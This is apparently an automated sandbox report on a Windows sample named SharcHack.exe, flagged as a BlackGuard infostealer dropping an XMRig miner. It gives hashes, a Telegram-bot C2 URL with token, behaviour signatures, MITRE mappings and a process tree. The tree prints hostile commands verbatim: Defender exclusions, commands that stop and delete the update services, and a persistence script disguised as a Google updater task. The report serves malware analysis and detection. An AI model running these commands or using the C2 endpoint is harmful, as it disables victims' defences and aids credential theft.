Overview

overview

10

Static

static

3

SharcHack.exe

windows7-x64

10

SharcHack.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-12-2024 21:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SharcHack.exe

  • Size

    39.9MB

  • MD5

    796310542e9fb2886de3f8cbdf88c9fa

  • SHA1

    01dc8e64ff23db2f177e3d999c12329bfcd206d3

  • SHA256

    9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193

  • SHA512

    73295b9cfa07432b21d1f0d0bad360460f32d7e0170dc84406a35f4dfe2b1519fdc4028299f1075385ae4ab738be1e5bfffd7335c1038e2126669834e9a50966

  • SSDEEP

    786432:Y31/CaCJz7+GWl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHng:URCR6GWl3LMEXFhV0KAcNjxAItjg

Score
10/10
blackguardxmrigdiscoveryevasionexecutionminerpersistenceprivilege_escalationspywarestealerupx

Malware Config

Extracted

Family

blackguard

C2

https://api.telegram.org/bot6540906397:AAG08fPgT-V7I17vtz49STaZEuwqXqKshuM/sendMessage?chat_id=5445185021

Signatures

  • BlackGuard

    Infostealer first seen in Late 2021.

    stealerblackguard
  • Blackguard family
    blackguard
  • Modifies security service 2 TTPs 5 IoCs
    evasion
  • Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 4 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Executes dropped EXE 21 IoCs
  • Loads dropped DLL 22 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks for any installed AV software in registry 1 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 10 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
    evasionspywaretrojan
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3588
      • C:\Users\Admin\AppData\Local\Temp\SharcHack.exe
        "C:\Users\Admin\AppData\Local\Temp\SharcHack.exe"
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3120
        • C:\Users\Admin\AppData\Local\Temp\3.exe
          "C:\Users\Admin\AppData\Local\Temp\3.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:4804
        • C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe
          "C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5088
          • C:\Users\Admin\AppData\Local\Temp\v2.exe
            "C:\Users\Admin\AppData\Local\Temp\v2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3888
        • C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe
          "C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:100
          • C:\Users\Admin\AppData\Local\Temp\is-FO6LJ.tmp\CheatEngine75.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-FO6LJ.tmp\CheatEngine75.tmp" /SL5="$6025A,29079073,832512,C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks for any installed AV software in registry
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            PID:1300
            • C:\Users\Admin\AppData\Local\Temp\is-9C7P3.tmp\prod0_extract\saBSI.exe
              "C:\Users\Admin\AppData\Local\Temp\is-9C7P3.tmp\prod0_extract\saBSI.exe" /affid 91082 PaidDistribution=true CountryCode=GB
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              PID:5040
              • C:\Users\Admin\AppData\Local\Temp\is-9C7P3.tmp\prod0_extract\installer.exe
                "C:\Users\Admin\AppData\Local\Temp\is-9C7P3.tmp\prod0_extract\\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade
                6⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                PID:2708
                • C:\Program Files\McAfee\Temp3733020042\installer.exe
                  "C:\Program Files\McAfee\Temp3733020042\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Program Files directory
                  • Modifies registry class
                  PID:4060
            • C:\Users\Admin\AppData\Local\Temp\is-9C7P3.tmp\prod1_extract\OperaSetup.exe
              "C:\Users\Admin\AppData\Local\Temp\is-9C7P3.tmp\prod1_extract\OperaSetup.exe" --silent --allusers=0 --otd=utm.medium:apb,utm.source:ais,utm.campaign:opera_new_a
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4548
              • C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe
                C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe --silent --allusers=0 --otd=utm.medium:apb,utm.source:ais,utm.campaign:opera_new_a --server-tracking-blob=NDg5MmM0M2NiZmYxOTc2MjY3ZDE3MGIyMzA3NGYyODVjNDZhOGNmNjg5YTA1ZDg5NTRhNThiN2MxZWIzZDk4OTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cyIsInRpbWVzdGFtcCI6IjE3MzUwMzgwMTIuNzc0NSIsInVzZXJhZ2VudCI6InB5dGhvbi1yZXF1ZXN0cy8yLjMyLjMiLCJ1dG0iOnt9LCJ1dWlkIjoiYWFmNjZmNDQtNWMyYy00ZmJmLTg0YmQtN2Y2OTE0MGY0MGRiIn0=
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Enumerates connected drives
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                PID:2252
                • C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe
                  C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.119 --initial-client-data=0x330,0x334,0x338,0x32c,0x33c,0x717f9d44,0x717f9d50,0x717f9d5c
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1528
                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:3232
                • C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2252 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241228211952" --session-guid=daf4266e-715b-4322-ae1e-6ec5e620655b --server-tracking-blob="NGEwNTZiMGVmZmM1MmRlYjUzNmQyNjkwMGU1OTc5ODUyN2U4ZjAwYTBlNDQ0NTQ4ZTA2NDk3ODQ2MmNmNjI5NTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTczNTAzODAxMi43NzQ1IiwidXNlcmFnZW50IjoicHl0aG9uLXJlcXVlc3RzLzIuMzIuMyIsInV0bSI6eyJjYW1wYWlnbiI6Im9wZXJhX25ld19hIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiYWlzIn0sInV1aWQiOiJhYWY2NmY0NC01YzJjLTRmYmYtODRiZC03ZjY5MTQwZjQwZGIifQ== " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=E005000000000000
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Enumerates connected drives
                  • System Location Discovery: System Language Discovery
                  PID:968
                  • C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe
                    C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.119 --initial-client-data=0x31c,0x320,0x324,0x2f8,0x328,0x70779d44,0x70779d50,0x70779d5c
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:2476
                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282119521\assistant\Assistant_114.0.5282.21_Setup.exe_sfx.exe
                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282119521\assistant\Assistant_114.0.5282.21_Setup.exe_sfx.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:5320
                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282119521\assistant\assistant_installer.exe
                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282119521\assistant\assistant_installer.exe" --version
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:5288
                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282119521\assistant\assistant_installer.exe
                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282119521\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=114.0.5282.21 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7117a0,0x7117ac,0x7117b8
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:4920
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1412
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1900
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:2100
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:2216
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:1280
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:4592
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:2180
        • C:\Windows\System32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
          3⤵
            PID:3608
          • C:\Windows\System32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
            3⤵
              PID:3320
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
              3⤵
              • Modifies security service
              PID:3564
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
              3⤵
                PID:5088
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                3⤵
                  PID:4992
              • C:\Windows\System32\cmd.exe
                C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                2⤵
                • Power Settings
                • Suspicious use of WriteProcessMemory
                PID:4836
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -hibernate-timeout-ac 0
                  3⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1484
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -hibernate-timeout-dc 0
                  3⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4532
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-ac 0
                  3⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4716
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4276
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4956
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:2264
                • C:\Windows\system32\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                  3⤵
                    PID:2000
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4724
                • C:\Windows\System32\cmd.exe
                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2696
                  • C:\Windows\System32\sc.exe
                    sc stop UsoSvc
                    3⤵
                    • Launches sc.exe
                    PID:216
                  • C:\Windows\System32\sc.exe
                    sc stop WaaSMedicSvc
                    3⤵
                    • Launches sc.exe
                    PID:4452
                  • C:\Windows\System32\sc.exe
                    sc stop wuauserv
                    3⤵
                    • Launches sc.exe
                    PID:2408
                  • C:\Windows\System32\sc.exe
                    sc stop bits
                    3⤵
                    • Launches sc.exe
                    PID:3724
                  • C:\Windows\System32\sc.exe
                    sc stop dosvc
                    3⤵
                    • Launches sc.exe
                    PID:4708
                  • C:\Windows\System32\reg.exe
                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                    3⤵
                      PID:4528
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                      3⤵
                        PID:1204
                      • C:\Windows\System32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                        3⤵
                          PID:528
                        • C:\Windows\System32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                          3⤵
                            PID:2256
                          • C:\Windows\System32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                            3⤵
                              PID:3036
                          • C:\Windows\System32\cmd.exe
                            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                            2⤵
                            • Power Settings
                            • Suspicious use of WriteProcessMemory
                            PID:4772
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -hibernate-timeout-ac 0
                              3⤵
                              • Power Settings
                              PID:1304
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -hibernate-timeout-dc 0
                              3⤵
                              • Power Settings
                              PID:828
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -standby-timeout-ac 0
                              3⤵
                              • Power Settings
                              PID:4768
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -standby-timeout-dc 0
                              3⤵
                              • Power Settings
                              PID:2644
                          • C:\Windows\System32\conhost.exe
                            C:\Windows\System32\conhost.exe ubulqosn
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4636
                          • C:\Windows\System32\cmd.exe
                            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                            2⤵
                            • Drops file in Program Files directory
                            PID:4916
                          • C:\Windows\System32\cmd.exe
                            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                            2⤵
                              PID:5000
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic PATH Win32_VideoController GET Name, VideoProcessor
                                3⤵
                                • Detects videocard installed
                                PID:4164
                            • C:\Windows\System32\conhost.exe
                              C:\Windows\System32\conhost.exe vgyegivgfazcjxdl 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/zRLKpUXs5FnM1Cz+lDKtsCEDVmxImOWutHy/wWAAF6uYRISXHrJSUiB0oBkYNVSVc+Z5TfdaGGtLWt9rhn1IwMTF8FurdYcS6sHeOOKov7n8fO9XzXfUsz+ohQT/DgIOyRpUwzATAbwxDv0BlAH+ISI2MOv7cXgWh/hEHn9UpTLH2AUxVXP8zWMLLWvPHAJe2SIfhjGncq3xQ+gVn+I4NKh77PPjDPgwHNzByaS5XiUtDR8Md5EhmkOEwD9v8Eh4nbJIewLTK837YGsKnb02yQo3e+jdFtCWzMfMeobPaXFvrKzv2emNNnxavmVO2FkfkcC1DvbnhN7NqgiVLh1FnuRerr7Rs9GSm8wk3eogEBuxtyJF/l7QvFFEn+PmzyQ6wNeX5T4KpCB8N2LdQ7qGf0xREtOLrL2we+R3IiFUCw/PgUnlB9aOUvPUntLmUYwnVg3n39kwuMDyHF7sntpqwSQW5ruNhQsPrhI9EqpLJ48=
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2100
                          • C:\Program Files\Google\Chrome\updater.exe
                            "C:\Program Files\Google\Chrome\updater.exe"
                            1⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3028
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                              2⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4816
                          • C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
                            "C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe"
                            1⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Program Files directory
                            • Modifies data under HKEY_USERS
                            PID:4332
                            • C:\Program Files\McAfee\WebAdvisor\UIHost.exe
                              "C:\Program Files\McAfee\WebAdvisor\UIHost.exe"
                              2⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:6072
                            • C:\Program Files\McAfee\WebAdvisor\updater.exe
                              "C:\Program Files\McAfee\WebAdvisor\updater.exe"
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              PID:2272
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c IF EXIST "C:\Program Files\McAfee\WebAdvisor\Download" ( DEL "C:\Program Files\McAfee\WebAdvisor\Download\*.bak" )
                                3⤵
                                  PID:4580
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c DEL "C:\Program Files\McAfee\WebAdvisor\*.tmp"
                                  3⤵
                                    PID:4268
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c dir "C:\Program Files (x86)\McAfee Security Scan" 2>nul
                                  2⤵
                                    PID:1404

                                Network

                                MITRE ATT&CK Enterprise v15

                                Reconnaissance

                                Resource Development

                                Initial Access

                                Execution

                                Command and Scripting Interpreter

                                1
                                T1059

                                PowerShell

                                1
                                T1059.001

                                System Services

                                1
                                T1569

                                Service Execution

                                1
                                T1569.002

                                Persistence

                                Create or Modify System Process

                                2
                                T1543

                                Windows Service

                                2
                                T1543.003

                                Event Triggered Execution

                                1
                                T1546

                                Component Object Model Hijacking

                                1
                                T1546.015

                                Power Settings

                                1
                                T1653

                                Privilege Escalation

                                Create or Modify System Process

                                2
                                T1543

                                Windows Service

                                2
                                T1543.003

                                Event Triggered Execution

                                1
                                T1546

                                Component Object Model Hijacking

                                1
                                T1546.015

                                Defense Evasion

                                Impair Defenses

                                1
                                T1562

                                Modify Registry

                                2
                                T1112

                                Subvert Trust Controls

                                1
                                T1553

                                Install Root Certificate

                                1
                                T1553.004

                                Credential Access

                                Credentials from Password Stores

                                1
                                T1555

                                Credentials from Web Browsers

                                1
                                T1555.003

                                Unsecured Credentials

                                2
                                T1552

                                Credentials In Files

                                2
                                T1552.001

                                Discovery

                                Browser Information Discovery

                                1
                                T1217

                                Peripheral Device Discovery

                                1
                                T1120

                                Query Registry

                                5
                                T1012

                                Software Discovery

                                1
                                T1518

                                Security Software Discovery

                                1
                                T1518.001

                                System Information Discovery

                                5
                                T1082

                                System Location Discovery

                                1
                                T1614

                                System Language Discovery

                                1
                                T1614.001

                                Lateral Movement

                                Collection

                                Data from Local System

                                2
                                T1005

                                Command and Control

                                Exfiltration

                                Impact

